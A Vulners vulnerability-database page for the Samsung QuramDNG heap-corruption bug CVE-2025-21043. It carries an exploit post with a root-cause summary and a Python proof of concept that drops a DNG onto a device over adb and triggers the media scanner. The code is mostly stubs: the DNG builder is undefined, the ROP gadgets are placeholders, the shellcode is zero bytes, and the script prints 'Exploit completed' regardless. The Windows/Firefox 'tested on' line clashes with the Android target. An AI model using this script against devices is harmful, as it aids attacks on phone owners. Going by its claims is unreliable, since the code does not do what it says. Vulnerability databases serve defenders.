Vulners
Lucene search
📄 Samsung QuramDNG Heap Corruption
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | CVE-2025-21043 | 12 Sep 202507:40 | – | circl |
 | Samsung Mobile Devices Out-of-Bounds Write Vulnerability | 2 Oct 202500:00 | – | cisa_kev |
 | CISA Adds Five Known Exploited Vulnerabilities to Catalog | 2 Oct 202512:00 | – | cisa |
 | SAMSUNG SMR 安全漏洞 | 12 Sep 202500:00 | – | cnnvd |
 | CVE-2025-21043 | 12 Sep 202507:21 | – | cve |
 | CVE-2025-21043 | 12 Sep 202507:21 | – | cvelist |
 | EUVD-2025-29028 | 12 Sep 202507:21 | – | euvd |
 | Samsung Fixes Image Parsing Vulnerability Exploited in Android Attacks | 14 Sep 202522:17 | – | hackread |
 | Samsung zero-day lets attackers take over your phone | 11 Nov 202514:28 | – | malwarebytes |
 | CVE-2025-21043 | 12 Sep 202508:15 | – | nvd |
10
=============================================================================================================================================
| # Title : Samsung QuramDNG Heap Exploitation via Malformed (libimagecodec.quram.so) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built‑in component. No standalone download available. |
=============================================================================================================================================
[+] Summary : A vulnerability exists in Samsung’s image decoding library (libimagecodec.quram.so) responsible for parsing Digital Negatives (DNG).
A malformed DNG containing oversized IFD entries can cause heap corruption.
With precise heap grooming, this condition may lead to remote code execution when the malicious DNG is decoded.
[+] Affected Platforms (Likely Impact)
Devices using Quram Codec and containing vulnerable libimagecodec.quram.so, typically:
Galaxy S22 / S23 / S24 series
Galaxy Z Fold / Z Flip
Galaxy A and Tab series
Any Samsung model using Quram decoder before SMR‑SEP‑2025
[+] OS Builds Affected:
Android builds where the Quram codec is present and security patch level < September 2025
[+] Technical Description (Root Cause)
libimagecodec.quram.so fails to sanitize the size of metadata entries when parsing a DNG file:
The IFD entry count is taken from the attacker-controlled file.
Size validation is missing.
Heap allocator metadata and adjacent buffers may be overwritten.
Controlled overwrite can result in hijacked code execution.
Critical vulnerable function:
doMapPoly16()
located inside Quram image parsing logic.
Instructions For Saving:
------------------------
1) Save file as:
poc.py
Instructions For Running:
-------------------------
python3 poc.py
[+] POC :
import os
import subprocess
import time
class QuramDngExploit:
def __init__(self):
self.malicious_dng = None
def craft_exploit(self):
"""Create DNG with controlled heap layout"""
print("[*] Crafting malicious DNG file...")
dng_data = create_malicious_dng()
return dng_data
def spray_heap(self):
"""Spray heap with controlled objects"""
spray_code = """
import java.util.ArrayList;
public class HeapSpray {
private static ArrayList<byte[]> sprayList = new ArrayList<>();
public static void spray(int count, int size) {
for (int i = 0; i < count; i++) {
byte[] buffer = new byte[size];
for (int j = 0; j < size; j += 8) {
buffer[j] = (byte)0x41;
}
sprayList.add(buffer);
}
}
}
"""
def trigger(self):
"""Trigger the vulnerability"""
print("[*] Triggering vulnerability...")
temp_file = "/data/local/tmp/exploit.dng"
with open(temp_file, 'wb') as f:
f.write(self.craft_exploit())
cmd = [
'adb', 'shell',
'am', 'broadcast',
'-a', 'android.intent.action.MEDIA_SCANNER_SCAN_FILE',
'-d', f'file://{temp_file}'
]
subprocess.run(cmd)
print("[*] Waiting for com.samsung.ipservice to process file...")
time.sleep(10)
self.monitor_logcat()
def monitor_logcat(self):
"""Monitor for crash logs"""
print("[*] Monitoring logcat for crashes...")
logcat = subprocess.Popen(
['adb', 'logcat', '-s', 'DEBUG'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
for line in logcat.stdout:
line = line.decode('utf-8', errors='ignore')
if 'SIGSEGV' in line or 'libimagecodec.quram' in line:
print("[+] Crash detected!")
print(line)
break
def build_rop_chain(self):
"""Build ROP chain for ARM64"""
rop_chain = []
gadgets = {
'pop_x0': 0x123456, # placeholder
'pop_x1': 0x123457,
'system': 0x123458,
'blr_x19': 0x123459,
}
return rop_chain
def achieve_rce(self):
"""Attempt to achieve Remote Code Execution"""
print("[*] Attempting to achieve RCE...")
shellcode = (
b"\x00\x00\x00\x00"
)
return False
if __name__ == "__main__":
exploit = QuramDngExploit()
print("[*] Starting QuramDng exploit (CVE-2025-21043)")
print("[*] Target: libimagecodec.quram.so")
print("[*] Vulnerability: OOB Write in doMapPoly16")
exploit.craft_exploit()
exploit.trigger()
print("[*] Exploit completed")
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Feb 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.18.8 - 9.8
EPSS0.04908
SSVC